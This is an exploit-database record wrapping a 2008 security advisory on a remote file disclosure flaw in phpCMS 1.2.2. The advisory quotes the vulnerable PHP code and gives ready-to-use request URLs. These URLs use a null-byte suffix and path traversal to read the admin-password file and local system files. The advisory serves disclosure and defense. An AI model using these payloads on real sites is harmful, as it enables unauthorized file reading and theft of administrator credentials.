Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-2561", "type": "zdt", "bulletinFamily": "exploit", "title": "phpCMS 1.2.2 (parser.php file) Remote File Disclosure Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2008-01-29T00:00:00", "modified": "2008-01-29T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/2561", "reporter": "DSecRG", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-26T23:16:46", "viewCount": 7, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://0day.today/exploit/2561", "sourceData": "===================================================================\r\nphpCMS 1.2.2 (parser.php file) Remote File Disclosure Vulnerability\r\n===================================================================\r\n\r\n\r\n\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-08-005\r\n\r\n\r\nApplication: phpCMS\r\nVersions Affected: 1.2.2\r\nVendor URL: http://www.phpcms.de\r\nBug: Remote File Disclosure, Get admin password\r\nExploits: YES\r\nReported: 10.01.2008\r\nVendor response: 12.01.2008\r\nDate of Public Advisory: 29.01.2008\r\nAuthors: Alexandr Polyakov, Stas Svistunovich\r\n Digital Security Research Group [DSecRG] \r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nphpCMS system has remote File Disclosure vulnerability in page /parser/include/class.cache_phpcms.php\r\n\r\n\r\nDetails\r\n*******\r\n\r\nAttacer can read any files in web directory.\r\n\r\nIn file parser/parser.php include class.cache_phpcms.php\r\n\r\n---------------------------------------\r\n\r\n // Load the i18n Handler\r\n if (isset ($_GET ['file']) && isset($DEFAULTS->I18N) && 'on' == $DEFAULTS->I18N) {\r\n include(PHPCMS_INCLUDEPATH.'/class.lib_i18n_phpcms.php');\r\n $I18N = &new i18n;\r\n }\r\n $PHPCMS->check_secure_stealth();\r\n include(PHPCMS_INCLUDEPATH.'/class.cache_phpcms.php');\r\n exit;\r\n\r\n---------------------------------------\r\n\r\n\r\nIn file class.cache_phpcms.php function GetFile() parse URL and return full file name or default value.\r\nFunction checks file extension but does't check for null byte injection.\r\n\r\nTo read file attacker must append a valid extension with null byte to file like a \"%00.gif\" or smth.\r\n\r\n---------------------------------------\r\n\r\n// filequery exists, but filename is empty? -> set the defaultvalue for filename\r\nif(!stristr($temp, $DEFAULTS->PAGE_EXTENSION) AND\r\n !stristr($temp, '.gif') AND\r\n !stristr($temp, '.png') AND\r\n !stristr($temp, '.jpg') AND\r\n !stristr($temp, '.js') AND\r\n !stristr($temp, '.css') AND\r\n !stristr($temp, '.htm') AND\r\n !stristr($temp, '.html'))\r\n\r\n{ if(substr($temp, -1) != '/') {\r\n $temp = trim($temp).'/'.$DEFAULTS->PAGE_DEFAULTNAME;\r\n $temp.= $DEFAULTS->PAGE_EXTENSION;\r\n } else {\r\n $temp = trim($temp).$DEFAULTS->PAGE_DEFAULTNAME;\r\n $temp.= $DEFAULTS->PAGE_EXTENSION;\r\n }\r\n}\r\n\r\n---------------------------------------\r\n\r\n\r\nIn file class.cache_phpcms.php function CheckFile() take file name and if file exist read it and print file contents.\r\n\r\n---------------------------------------\r\n$PfadUndDatei = $this->GetFile();\r\n\r\n$this->name = basename($PfadUndDatei);\r\n$this->path = dirname($PfadUndDatei);\r\n...\r\n\r\n// there's no contentfile with this name -> errorpage or errormessage\r\nif(!file_exists($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name)) {\r\n $errorname = basename($DEFAULTS->ERROR_PAGE_404);\r\n $errorpath = dirname($DEFAULTS->ERROR_PAGE_404);\r\n ...\r\n...\r\n\r\n$fsize = filesize($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name);\r\n$fd = fopen($DEFAULTS->DOCUMENT_ROOT.$this->path.'/'.$this->name, \"rb\");\r\n$contents = fread($fd, $fsize);\r\n$contents = trim($contents);\r\n$fsize = strlen($contents);\r\nfclose($fd);\r\n...\r\n\r\necho $contents;\r\n\r\n---------------------------------------\r\n\r\n\r\nExample:\r\n\r\n\r\n\r\nhttp://[server]/[installdir]/parser/parser.php?file=/parser/include/default.php%00.gif\r\n\r\ndefault.php includes admin password and other defaults:\r\n\r\n---------------------------------------\r\n\r\nclass defaults {\r\n function defaults() {\r\n global $PHP, $PHPCMS;\r\n if(!defined(\"_DEFAULTS_\")) {\r\n define(\"_DEFAULTS_\", TRUE);\r\n }\r\n\r\n $this->PASS = 'YourPasswordHere';\r\n...\r\n\r\n---------------------------------------\r\n\r\n\r\nIn windows we can read any local file:\r\n\r\nhttp://[server]/[installdir]/parser/parser.php?file=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini%00.gif\r\n\r\n\r\n\r\n\r\nhttp://www.phpcms.de/download/index.en.html\r\n\r\n\r\n\r\n\r\n\r\n\r\nAbout\r\n*****\r\n\r\n\r\n\r\n\r\nDigital Security is leading IT security company in Russia, providing information security consulting, audit \r\nand penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 \r\nand PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with \r\nvulnerability reports, advisories and whitepapers posted regularly on our website.\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-26] #", "_state": {"dependencies": 1645262992}}
phpCMS 1.2.2 (parser.php file) Remote File Disclosure Vulnerability